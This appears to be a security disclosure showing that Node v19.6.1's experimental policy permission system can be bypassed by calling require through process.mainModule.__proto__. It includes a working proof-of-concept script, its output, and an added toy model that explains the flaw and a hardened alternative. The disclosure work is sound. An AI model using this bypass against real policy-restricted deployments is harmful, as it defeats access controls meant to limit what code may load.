process.mainModule.require() works correctly with the permission system in Node v19.6.1.
However, going through __proto__, as in process.mainModule.__proto__.require(), bypasses the check.
Consider the following policy.json:
{
  "resources": {
    "./proc.js": {
      "integrity": true
    }
  }
}
The policy allows only the proc.js file to be loaded, without any dependencies.
However, with the following proc.js:
const os = process.mainModule.__proto__.require("os")
console.log(process.version)
console.log(os.version())
We get the output:
$ ../node-v19.6.1-linux-x64/bin/node --experimental-policy=policy.json proc.js
v19.6.1
#1 SMP PREEMPT Debian 5.16.18-1kali1 (2022-04-01)
(node:2720) ExperimentalWarning: Policies are experimental.
(Use `node --trace-warnings ...` to show where the warning was created)
Therefore the os dependency can be loaded and os.version() executed even though it is not specified in the permission system.
Bypass the permission system
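
The failure mode behind this report, as an added toy model (not Node's loader code and not part of the original report). It assumes, for illustration only, that the policy check is installed on the module object itself while an unguarded require stays on the prototype, and contrasts that with a check placed inside the prototype method. ToyModule, HardenedModule, installInstanceGuard and the allowed set are hypothetical names.

```javascript
// Constructed model: the policy.json above lists no dependencies.
const allowed = new Set();

function check(id) {
  if (!allowed.has(id)) throw new Error(`policy: ${id} not permitted`);
}

class ToyModule {
  // Stand-in for a raw loader on the prototype, with no policy check.
  require(id) { return `loaded:${id}`; }
}

class HardenedModule {
  // The check lives in the prototype method, so every lookup path hits it.
  require(id) { check(id); return `loaded:${id}`; }
}

// Weak form: the guard is an own property that only shadows the prototype
// method. Anything that reads the method from the prototype skips it.
function installInstanceGuard(mod) {
  const raw = Object.getPrototypeOf(mod).require;
  Object.defineProperty(mod, 'require', {
    value(id) { check(id); return raw.call(mod, id); },
  });
  return mod;
}

// Runs one access path; returns the loader result or 'blocked'.
function attempt(fn) {
  try { return fn(); } catch (e) {
    if (String(e.message).startsWith('policy:')) return 'blocked';
    throw e; // unexpected error: do not hide it
  }
}

function demo() {
  const weak = installInstanceGuard(new ToyModule());
  const hard = new HardenedModule();
  return {
    weakDirect: attempt(() => weak.require('os')),
    weakViaProto: attempt(() => weak.__proto__.require('os')),
    hardDirect: attempt(() => hard.require('os')),
    hardViaProto: attempt(() => hard.__proto__.require('os')),
  };
}

console.log(demo());
```

Only the instance-guarded object lets the prototype path through; with the check inside the prototype method, both paths are refused.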